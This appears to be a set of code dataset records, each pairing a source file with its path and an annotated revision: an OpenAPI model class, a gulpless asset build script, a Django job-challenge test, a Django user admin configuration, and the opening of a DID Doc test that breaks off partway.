"obsoletion_package_id": "obsoletionPackageId", # noqa: E501
"part_id": "partId", # noqa: E501
"part_number": "partNumber", # noqa: E501
"previous_revision_id": "previousRevisionId", # noqa: E501
"release_created_date": "releaseCreatedDate", # noqa: E501
"release_id": "releaseId", # noqa: E501
"release_name": "releaseName", # noqa: E501
"released_by": "releasedBy", # noqa: E501
"revision": "revision", # noqa: E501
"revision_rule_id": "revisionRuleId", # noqa: E501
"version_id": "versionId", # noqa: E501
"version_name": "versionName", # noqa: E501
"view_ref": "viewRef", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_revision_info.BTRevisionInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
approvers ([bt_revision_approver_info.BTRevisionApproverInfo]): [optional] # noqa: E501
auto_obsoletion_release_id (str): [optional] # noqa: E501
auto_obsoletion_release_name (str): [optional] # noqa: E501
can_current_user_obsolete (bool): [optional] # noqa: E501
can_export (bool): [optional] # noqa: E501
company_id (str): [optional] # noqa: E501
configuration (str): [optional] # noqa: E501
document_id (str): [optional] # noqa: E501
document_name (str): [optional] # noqa: E501
element_id (str): [optional] # noqa: E501
element_type (int): [optional] # noqa: E501
error_message (str): [optional] # noqa: E501
file_name (str): [optional] # noqa: E501
flat_part_insertable_id (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
insertable_id (str): [optional] # noqa: E501
is_obsolete (bool): [optional] # noqa: E501
is_translatable (bool): [optional] # noqa: E501
mime_type (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
next_revision_id (str): [optional] # noqa: E501
obsoletion_package_id (str): [optional] # noqa: E501
part_id (str): [optional] # noqa: E501
part_number (str): [optional] # noqa: E501
previous_revision_id (str): [optional] # noqa: E501
release_created_date (datetime): [optional] # noqa: E501
release_id (str): [optional] # noqa: E501
release_name (str): [optional] # noqa: E501
released_by (bt_user_summary_info.BTUserSummaryInfo): [optional] # noqa: E501
revision (str): [optional] # noqa: E501
revision_rule_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
version_name (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
from __future__ import absolute_import, unicode_literals, division
import subprocess
import gulpless
import logging
import shutil
import re
import os
# Names of the npm-installed CLI tools driven by the handlers below.
UGLIFY = "uglifyjs"
TSC = "tsc"
LESSC = "lessc"
AUTOPREFIXER = "autoprefixer"
IMAGEMIN = "imagemin"
# On Windows, npm installs executables as *.cmd shims.
if os.name != "posix":
    UGLIFY += ".cmd"
    TSC += ".cmd"
    LESSC += ".cmd"
    AUTOPREFIXER += ".cmd"
    IMAGEMIN += ".cmd"
class JavascriptHandler(gulpless.TreeHandler):
    """Concatenates ``/// <reference path="..."/>`` includes and minifies
    them with UglifyJS, emitting the bundle, its source map, and gzipped
    copies of both."""

    # Raw string: the original non-raw pattern relied on invalid `\s`
    # escapes (a DeprecationWarning / SyntaxWarning on modern Python).
    include = re.compile(r"///.*?<reference\s+path=[\"\'](.*)[\"\']\s*/>", re.I)

    def __init__(self, patterns, ignore_patterns=None):
        super(JavascriptHandler, self).__init__(patterns, ignore_patterns,
                                                ["", ".gz", ".map", ".map.gz"])

    def build(self, input_path, output_paths):
        js, js_gz, smap, smap_gz = output_paths
        # Collect referenced files (deduplicated, first-seen order).
        imports = set()
        cmdline = [UGLIFY]
        current = os.path.dirname(input_path)
        with open(input_path) as source:  # the original leaked this handle
            for line in source:
                match = self.include.search(line)
                if not match:
                    continue
                path = os.path.normcase(os.path.normpath(
                    os.path.join(current, match.group(1))))
                if path in imports:
                    logging.warning("Skipping duplicate import for '{0}' in "
                                    "'{1}'".format(path, input_path))
                else:
                    imports.add(path)
                    cmdline.append(path.replace(os.sep, "/"))
        if len(cmdline) == 1:
            raise EnvironmentError("Nothing to build")
        cmdline += ["--source-map", smap,
                    "--source-map-url", os.path.basename(smap),
                    "--source-map-include-sources",
                    "--prefix", str(input_path.count(os.sep)),
                    "--compress", "warnings=false,drop_debugger=false",
                    "--mangle"]
        try:
            with open(js, "wb") as out:  # the original leaked this handle
                retcode = subprocess.call(cmdline, stdout=out)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g uglify-js` ?".format(UGLIFY))
        # Checked outside the try: the original raised this inside it, so its
        # own `except EnvironmentError` swallowed and mis-reported it.
        if retcode != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(UGLIFY))
        # gzip outputs (compression level 6)
        gulpless.gzip(js, js_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class TypescriptHandler(gulpless.TreeHandler):
    """Compiles a TypeScript file with tsc, then minifies the result with
    UglifyJS, chaining the source maps."""

    def __init__(self, patterns, ignore_patterns=None):
        super(TypescriptHandler, self).__init__(patterns, ignore_patterns,
                                                ["", ".gz", ".map", ".map.gz"])

    def _outputs(self, src, path):
        # foo.ts -> foo.js
        return super(TypescriptHandler, self)._outputs(src, path[:-2] + "js")

    def build(self, input_path, output_paths):
        js, js_gz, smap, smap_gz = output_paths
        # compile .ts -> .js with a source map
        cmdline = [TSC, input_path,
                   "--out", js,
                   "--sourcemap",
                   "--sourceRoot", "."]
        try:
            retcode = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run "
                                   "`npm install -g typescript` ?".format(TSC))
        # Checked outside the try: the original raised this inside it, so its
        # own `except EnvironmentError` swallowed and mis-reported it as a
        # startup failure.
        if retcode != 0:
            raise EnvironmentError("Non-zero exit code in {0}".format(TSC))
        # minify in place, feeding tsc's map in and writing the final map out
        cmdline = [UGLIFY, js,
                   "--in-source-map", smap,
                   "--source-map", smap,
                   "--source-map-url", os.path.basename(smap),
                   "--source-map-include-sources",
                   "--prefix", "relative",
                   "--compress", "warnings=false,drop_debugger=false",
                   "--mangle",
                   "--output", js]
        try:
            retcode = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to run {0}. Did you run `npm "
                                   "install -g uglify-js` ?".format(UGLIFY))
        if retcode != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(UGLIFY))
        # gzip outputs (compression level 6)
        gulpless.gzip(js, js_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class LessHandler(gulpless.TreeHandler):
    """Compiles a LESS file to minified CSS, runs autoprefixer over it, and
    gzips the results."""

    def __init__(self, patterns, ignore_patterns=None):
        super(LessHandler, self).__init__(patterns, ignore_patterns,
                                          ["", ".gz", ".map", ".map.gz"])

    def _outputs(self, src, path):
        # foo.less -> foo.css
        return super(LessHandler, self)._outputs(src, path[:-4] + "css")

    def build(self, input_path, output_paths):
        css, css_gz, smap, smap_gz = output_paths
        # compile + compress
        cmdline = [LESSC,
                   "--source-map={0}".format(smap),
                   "--source-map-url={0}".format(os.path.basename(smap)),
                   "--source-map-less-inline",
                   "--compress",
                   input_path,
                   css]
        try:
            retcode = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g less` ?".format(LESSC))
        # Checked outside the try: the original raised this inside it, so its
        # own `except EnvironmentError` swallowed and mis-reported it.
        if retcode != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(LESSC))
        # add vendor prefixes in place
        cmdline = [AUTOPREFIXER,
                   css,
                   "--map",
                   "--no-cascade",
                   "--output", css]
        try:
            retcode = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g autoprefixer` "
                                   "?".format(AUTOPREFIXER))
        if retcode != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(AUTOPREFIXER))
        # gzip outputs (compression level 6)
        gulpless.gzip(css, css_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class StaticHandler(gulpless.Handler):
    """Copies a matched file verbatim and also emits a gzipped sibling."""

    def __init__(self, patterns, ignore_patterns=None):
        super(StaticHandler, self).__init__(patterns, ignore_patterns,
                                            ["", ".gz"])

    def build(self, input_path, output_paths):
        plain, gzipped = output_paths
        shutil.copy(input_path, plain)
        gulpless.gzip(input_path, gzipped)
class ImageHandler(gulpless.Handler):
    """Minifies an image with imagemin, capturing its stdout into the output file."""

    def __init__(self, patterns, ignore_patterns=None):
        super(ImageHandler, self).__init__(patterns, ignore_patterns)

    def build(self, input_path, output_paths):
        output_path, = output_paths
        # minify
        cmdline = [IMAGEMIN, input_path,
                   "--interlaced",
                   "--optimizationLevel", "3",
                   "--progressive"]
        # `with` closes the output handle deterministically (the original
        # leaked it). Only launch failures are caught; a non-zero exit is
        # reported after the try block. Fixed: the original error path called
        # str.FORMAT, which would raise AttributeError instead of the message.
        try:
            with open(output_path, "wb") as out:
                status = subprocess.call(cmdline, stdout=out)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g imagemin` ?".format(IMAGEMIN))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(IMAGEMIN))
# project configuration
SRC = "resources/"
DEST = "static/"
HANDLERS = [
JavascriptHandler(["js/*.js"]),
TypescriptHandler(["js/*.ts"], ["js/*.d.ts"]),
LessHandler(["css/*.less"], ["*bootstrap/*.less"]),
StaticHandler(["fonts/*", "crossdomain.xml", "respond-*"]),
ImageHandler(["img/*"])
] | examples/build.py | from __future__ import absolute_import, unicode_literals, division
import subprocess
import gulpless
import logging
import shutil
import re
import os
UGLIFY = "uglifyjs"
TSC = "tsc"
LESSC = "lessc"
AUTOPREFIXER = "autoprefixer"
IMAGEMIN = "imagemin"
if os.name != "posix":
UGLIFY += ".cmd"
TSC += ".cmd"
LESSC += ".cmd"
AUTOPREFIXER += ".cmd"
IMAGEMIN += ".cmd"
class JavascriptHandler(gulpless.TreeHandler):
    """Concatenates JS files listed via ///<reference> directives and minifies them."""

    # Matches ///<reference path="..."/> include directives (case-insensitive).
    # Raw string avoids invalid-escape warnings for \s (the regex is unchanged).
    include = re.compile(r"///.*?<reference\s+path=[\"\'](.*)[\"\']\s*/>", re.I)

    def __init__(self, patterns, ignore_patterns=None):
        super(JavascriptHandler, self).__init__(patterns, ignore_patterns,
                                                ["", ".gz", ".map", ".map.gz"])

    def build(self, input_path, output_paths):
        js, js_gz, smap, smap_gz = output_paths
        # Collect the referenced source files, skipping duplicates.
        imports = set()
        cmdline = [UGLIFY]
        current = os.path.dirname(input_path)
        with open(input_path) as handle:  # close the file deterministically
            for line in handle:
                match = self.include.search(line)
                if not match:
                    continue
                path = os.path.normcase(os.path.normpath(
                    os.path.join(current, match.group(1))))
                if path in imports:
                    logging.warning("Skipping duplicate import for '{0}' in "
                                    "'{1}'".format(path, input_path))
                else:
                    imports.add(path)
                    cmdline.append(path.replace(os.sep, "/"))
        if len(cmdline) == 1:
            raise EnvironmentError("Nothing to build")
        cmdline += ["--source-map", smap,
                    "--source-map-url", os.path.basename(smap),
                    "--source-map-include-sources",
                    "--prefix", str(input_path.count(os.sep)),
                    "--compress", "warnings=false,drop_debugger=false",
                    "--mangle"]
        # Catch only launch failures; a non-zero exit is reported after the
        # try block so it is not mislabeled as "unable to start" (the original
        # caught its own "non-zero exit" error and replaced the message).
        try:
            with open(js, "wb") as out:
                status = subprocess.call(cmdline, stdout=out)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g uglify-js` ?".format(UGLIFY))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(UGLIFY))
        # gzip
        gulpless.gzip(js, js_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class TypescriptHandler(gulpless.TreeHandler):
    """Compiles a TypeScript file with tsc, then minifies it with uglifyjs.

    Outputs: the .js file, its gzip, the source map, and the map's gzip.
    """

    def __init__(self, patterns, ignore_patterns=None):
        super(TypescriptHandler, self).__init__(patterns, ignore_patterns,
                                                ["", ".gz", ".map", ".map.gz"])

    def _outputs(self, src, path):
        # Map foo.ts -> foo.js (suffixes registered in __init__ are appended).
        return super(TypescriptHandler, self)._outputs(src, path[:-2] + "js")

    def build(self, input_path, output_paths):
        js, js_gz, smap, smap_gz = output_paths
        # compile
        cmdline = [TSC, input_path,
                   "--out", js,
                   "--sourcemap",
                   "--sourceRoot", "."]
        # Catch only launch failures here; a non-zero exit is reported after
        # the try block so it is not mislabeled as "unable to start" (the
        # original caught its own "non-zero exit" error and re-raised it with
        # the misleading npm-install message).
        try:
            status = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run "
                                   "`npm install -g typescript` ?".format(TSC))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in {0}".format(TSC))
        # uglify (rewrites the compiled JS in place, updating the source map)
        cmdline = [UGLIFY, js,
                   "--in-source-map", smap,
                   "--source-map", smap,
                   "--source-map-url", os.path.basename(smap),
                   "--source-map-include-sources",
                   "--prefix", "relative",
                   "--compress", "warnings=false,drop_debugger=false",
                   "--mangle",
                   "--output", js]
        try:
            status = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to run {0}. Did you run `npm "
                                   "install -g uglify-js` ?".format(UGLIFY))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(UGLIFY))
        # gzip both artifacts at compression level 6
        gulpless.gzip(js, js_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class LessHandler(gulpless.TreeHandler):
    """Compiles a LESS file to CSS, runs autoprefixer, and gzips the results."""

    def __init__(self, patterns, ignore_patterns=None):
        super(LessHandler, self).__init__(patterns, ignore_patterns,
                                          ["", ".gz", ".map", ".map.gz"])

    def _outputs(self, src, path):
        # Map foo.less -> foo.css (suffixes registered in __init__ are appended).
        return super(LessHandler, self)._outputs(src, path[:-4] + "css")

    def build(self, input_path, output_paths):
        css, css_gz, smap, smap_gz = output_paths
        # compile
        cmdline = [LESSC,
                   "--source-map={0}".format(smap),
                   "--source-map-url={0}".format(os.path.basename(smap)),
                   "--source-map-less-inline",
                   "--compress",
                   input_path,
                   css]
        # Catch only launch failures; a non-zero exit is reported after the
        # try block so it is not mislabeled as "unable to start" (the original
        # caught its own "non-zero exit" error and replaced the message).
        try:
            status = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g less` ?".format(LESSC))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(LESSC))
        # autoprefix (rewrites the CSS in place)
        cmdline = [AUTOPREFIXER,
                   css,
                   "--map",
                   "--no-cascade",
                   "--output", css]
        try:
            status = subprocess.call(cmdline)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g autoprefixer` "
                                   "?".format(AUTOPREFIXER))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(AUTOPREFIXER))
        # gzip
        gulpless.gzip(css, css_gz, 6)
        gulpless.gzip(smap, smap_gz, 6)
class StaticHandler(gulpless.Handler):
    """Copies a matched file verbatim and also emits a gzipped sibling."""

    def __init__(self, patterns, ignore_patterns=None):
        super(StaticHandler, self).__init__(patterns, ignore_patterns,
                                            ["", ".gz"])

    def build(self, input_path, output_paths):
        plain, gzipped = output_paths
        shutil.copy(input_path, plain)
        gulpless.gzip(input_path, gzipped)
class ImageHandler(gulpless.Handler):
    """Minifies an image with imagemin, capturing its stdout into the output file."""

    def __init__(self, patterns, ignore_patterns=None):
        super(ImageHandler, self).__init__(patterns, ignore_patterns)

    def build(self, input_path, output_paths):
        output_path, = output_paths
        # minify
        cmdline = [IMAGEMIN, input_path,
                   "--interlaced",
                   "--optimizationLevel", "3",
                   "--progressive"]
        # `with` closes the output handle deterministically (the original
        # leaked it). Only launch failures are caught; a non-zero exit is
        # reported after the try block. Fixed: the original error path called
        # str.FORMAT, which would raise AttributeError instead of the message.
        try:
            with open(output_path, "wb") as out:
                status = subprocess.call(cmdline, stdout=out)
        except EnvironmentError:
            raise EnvironmentError("Unable to start {0}. Did you run `npm "
                                   "install -g imagemin` ?".format(IMAGEMIN))
        if status != 0:
            raise EnvironmentError("Non-zero exit code in "
                                   "{0}".format(IMAGEMIN))
# project configuration
# Source tree watched for changes, and destination for built artifacts.
SRC = "resources/"
DEST = "static/"
# Build pipeline: each handler claims files matching its glob patterns;
# a second argument, where present, lists patterns to ignore.
HANDLERS = [
    JavascriptHandler(["js/*.js"]),
    TypescriptHandler(["js/*.ts"], ["js/*.d.ts"]),  # skip declaration files
    LessHandler(["css/*.less"], ["*bootstrap/*.less"]),
    StaticHandler(["fonts/*", "crossdomain.xml", "respond-*"]),
    ImageHandler(["img/*"])
]
from unittest.mock import patch
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.test import Client, TestCase
from django.urls import resolve, reverse
from model_bakery import baker as mommy
import responses
from pyjobs.core.models import Job, Profile, JobApplication
from pyjobs.core.views import index
import datetime
class TestingRestrictedViews(TestCase):
@responses.activate
@patch("pyjobs.marketing.triggers.send_group_notification")
@patch("pyjobs.marketing.triggers.send_job_to_github_issues")
@patch("pyjobs.marketing.triggers.post_telegram_channel")
def setUp(
self, _mocked_send_group_push, _mock_github, _mocked_post_telegram_channel
):
self.job = mommy.make(
"core.Job", is_challenging=True, challenge="Ola mundo dos testes"
)
self.user = User.objects.create_user(
username="jacob", email="<EMAIL>", password="<PASSWORD>"
)
self.profile = Profile.objects.create(
user=self.user,
github="http://www.github.com/foobar",
linkedin="http://www.linkedin.com/in/foobar",
portfolio="http://www.foobar.com/",
cellphone="11981435390",
)
self.client = Client()
self.client.login(username="jacob", password="<PASSWORD>")
def test_if_user_is_not_applied_to_job(self):
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Candidate-se para esta vaga pelo" in response.content)
def test_if_applied_user_can_get_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Clique aqui e preencha o desafio" in response.content)
def test_if_applied_user_can_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
def test_if_applied_user_cant_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
challenge_response_at=datetime.datetime.now(),
challenge_response_link="http://www.google.com",
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
self.assertEqual(200, response.status_code)
self.assertTrue(
bytes("Recebemos seu teste, aguarde nosso retorno!", "utf8")
in response.content
) | pyjobs/core/tests/test_job_challenge.py | from unittest.mock import patch
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.test import Client, TestCase
from django.urls import resolve, reverse
from model_bakery import baker as mommy
import responses
from pyjobs.core.models import Job, Profile, JobApplication
from pyjobs.core.views import index
import datetime
class TestingRestrictedViews(TestCase):
    """Tests for the job-challenge views restricted to applied users.

    Assertions match Portuguese strings rendered by the job templates —
    presumably stable template copy; verify against the templates if they
    change.
    """

    @responses.activate
    @patch("pyjobs.marketing.triggers.send_group_notification")
    @patch("pyjobs.marketing.triggers.send_job_to_github_issues")
    @patch("pyjobs.marketing.triggers.post_telegram_channel")
    def setUp(
        self, _mocked_send_group_push, _mock_github, _mocked_post_telegram_channel
    ):
        # NOTE(review): @patch decorators inject mocks bottom-up, so the first
        # parameter actually receives the post_telegram_channel mock — the
        # parameter names are in reverse order. Harmless here (all unused).
        # Creating the Job fires the patched marketing triggers.
        self.job = mommy.make(
            "core.Job", is_challenging=True, challenge="Ola mundo dos testes"
        )
        self.user = User.objects.create_user(
            username="jacob", email="<EMAIL>", password="<PASSWORD>"
        )
        # A Profile is created alongside the user so the views that read
        # profile data have something to render.
        self.profile = Profile.objects.create(
            user=self.user,
            github="http://www.github.com/foobar",
            linkedin="http://www.linkedin.com/in/foobar",
            portfolio="http://www.foobar.com/",
            cellphone="11981435390",
        )
        # All tests run as an authenticated client.
        self.client = Client()
        self.client.login(username="jacob", password="<PASSWORD>")

    def test_if_user_is_not_applied_to_job(self):
        """A logged-in user without an application sees the apply prompt."""
        response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
        self.assertEqual(200, response.status_code)
        self.assertTrue(b"Candidate-se para esta vaga pelo" in response.content)

    def test_if_applied_user_can_get_job_challenge(self):
        """Once applied (application email sent), the challenge link is shown."""
        self.job_application = JobApplication.objects.create(
            job=self.job,
            user=self.user,
            email_sent=True,
            email_sent_at=datetime.datetime.now(),
        )
        response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
        self.assertEqual(200, response.status_code)
        self.assertTrue(b"Clique aqui e preencha o desafio" in response.content)

    def test_if_applied_user_can_answer_job_challenge(self):
        """Applied user can open the challenge-submit page.

        NOTE(review): this test makes the request but asserts nothing —
        it only proves the view does not raise. Consider asserting the
        status code and page content.
        """
        self.job_application = JobApplication.objects.create(
            job=self.job,
            user=self.user,
            email_sent=True,
            email_sent_at=datetime.datetime.now(),
        )
        response = self.client.get(
            "/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
        )

    def test_if_applied_user_cant_answer_job_challenge(self):
        """A user who already submitted a response sees the confirmation text."""
        self.job_application = JobApplication.objects.create(
            job=self.job,
            user=self.user,
            email_sent=True,
            email_sent_at=datetime.datetime.now(),
            challenge_response_at=datetime.datetime.now(),
            challenge_response_link="http://www.google.com",
        )
        response = self.client.get(
            "/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
        )
        self.assertEqual(200, response.status_code)
        self.assertTrue(
            bytes("Recebemos seu teste, aguarde nosso retorno!", "utf8")
            in response.content
        )
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from accounts.models import User, UserSetting, UserProfile, UserSchool, UserLicense, UserEmployer, UserCertification
class CustomUserAdmin(UserAdmin):
list_display = ("id", "email", "username", "created", "modified")
list_filter = ("is_active", "is_staff", "groups")
search_fields = ("email", "username")
ordering = ("email",)
filter_horizontal = (
"groups",
"user_permissions",
)
fieldsets = (
(None, {"fields": ("email", "username", "password")}),
(
_("Permissions"),
{"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")},
),
)
add_fieldsets = ((None, {"classes": ("wide",), "fields": ("email", "username", "<PASSWORD>", "<PASSWORD>")}),)
class UserSettingAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserCertificationAdmin(admin.ModelAdmin):
list_display = ("id", "institution_name", "certificate_program", "certificate_number")
search_fields = ("user__username", "user__email", "institution_name", "certificate_program", "certificate_number")
ordering = ("certificate_program",)
class UserEmployerAdmin(admin.ModelAdmin):
list_display = ("id", "employer_name", "position", "current_position")
list_filter = ("current_position",)
search_fields = ("user__username", "user__email", "position", "current_position")
ordering = ("employer_name",)
class UserLicenseAdmin(admin.ModelAdmin):
list_display = ("id", "issuing_authority", "license_type", "license_number")
list_filter = ("completion_date", "expiration_date",)
search_fields = ("user__username", "user__email", "issuing_authority", "license_type", "license_number")
ordering = ("license_type",)
class UserSchoolAdmin(admin.ModelAdmin):
list_display = ("id", "school_name", "program", "degree_type", "current_student")
list_filter = ("current_student", "degree_type", "start_date", "graduate_date",)
search_fields = ("user__username", "user__email", "school_name", "program", "degree_type", "current_student")
ordering = ("school_name", "program")
admin.site.register(User, CustomUserAdmin)
admin.site.register(UserSetting, UserSettingAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(UserSchool, UserSchoolAdmin)
admin.site.register(UserLicense, UserLicenseAdmin)
admin.site.register(UserEmployer, UserEmployerAdmin)
admin.site.register(UserCertification, UserCertificationAdmin) | backend/accounts/admin.py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from accounts.models import User, UserSetting, UserProfile, UserSchool, UserLicense, UserEmployer, UserCertification
class CustomUserAdmin(UserAdmin):
    """Admin configuration for the project's custom User model."""
    list_display = ("id", "email", "username", "created", "modified")
    list_filter = ("is_active", "is_staff", "groups")
    search_fields = ("email", "username")
    ordering = ("email",)
    # Use the dual-listbox widget for the many-to-many permission fields.
    filter_horizontal = (
        "groups",
        "user_permissions",
    )
    fieldsets = (
        (None, {"fields": ("email", "username", "password")}),
        (
            _("Permissions"),
            {"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")},
        ),
    )
    # Fields on the "add user" form. The two "<PASSWORD>" entries are
    # redaction placeholders from the data dump — presumably the standard
    # password1/password2 pair; confirm against the original source.
    add_fieldsets = ((None, {"classes": ("wide",), "fields": ("email", "username", "<PASSWORD>", "<PASSWORD>")}),)
class UserSettingAdmin(admin.ModelAdmin):
    """Admin list configuration for per-user settings."""
    list_display = ("id", "user")
    search_fields = ("user__username", "user__email")
    ordering = ("user__email",)
class UserProfileAdmin(admin.ModelAdmin):
    """Admin list configuration for user profiles."""
    list_display = ("id", "user")
    search_fields = ("user__username", "user__email")
    ordering = ("user__email",)
class UserCertificationAdmin(admin.ModelAdmin):
    """Admin list configuration for user certification records."""
    list_display = ("id", "institution_name", "certificate_program", "certificate_number")
    search_fields = ("user__username", "user__email", "institution_name", "certificate_program", "certificate_number")
    ordering = ("certificate_program",)
class UserEmployerAdmin(admin.ModelAdmin):
    """Admin list configuration for user employment history."""
    list_display = ("id", "employer_name", "position", "current_position")
    list_filter = ("current_position",)
    search_fields = ("user__username", "user__email", "position", "current_position")
    ordering = ("employer_name",)
class UserLicenseAdmin(admin.ModelAdmin):
    """Admin list configuration for user license records."""
    list_display = ("id", "issuing_authority", "license_type", "license_number")
    list_filter = ("completion_date", "expiration_date",)
    search_fields = ("user__username", "user__email", "issuing_authority", "license_type", "license_number")
    ordering = ("license_type",)
class UserSchoolAdmin(admin.ModelAdmin):
    """Admin list configuration for user education records."""
    list_display = ("id", "school_name", "program", "degree_type", "current_student")
    list_filter = ("current_student", "degree_type", "start_date", "graduate_date",)
    search_fields = ("user__username", "user__email", "school_name", "program", "degree_type", "current_student")
    ordering = ("school_name", "program")
# Wire each model to its admin configuration class defined above.
admin.site.register(User, CustomUserAdmin)
admin.site.register(UserSetting, UserSettingAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(UserSchool, UserSchoolAdmin)
admin.site.register(UserLicense, UserLicenseAdmin)
admin.site.register(UserEmployer, UserEmployerAdmin)
admin.site.register(UserCertification, UserCertificationAdmin)
import json
import pytest
from von_anchor.a2a.diddoc import DIDDoc
from von_anchor.error import AbsentDIDDocItem
from von_anchor.frill import Ink, ppjson
@pytest.mark.asyncio
async def test_a2a():
print(Ink.YELLOW('\n\n== Testing DID Doc wranglers =='))
# One authn key by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': '4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
},
{
'id': '6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4'
}
],
'service': [
{
'id': '0',
'type': 'Agency',
'serviceEndpoint': 'did:sov:Q4zqM7aXqm7gDQkUVLng9h'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 1 == DID Doc on abbreviated identifiers: {}'.format(ppjson(dd_out)))
# One authn key embedded, all possible refs canonical
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
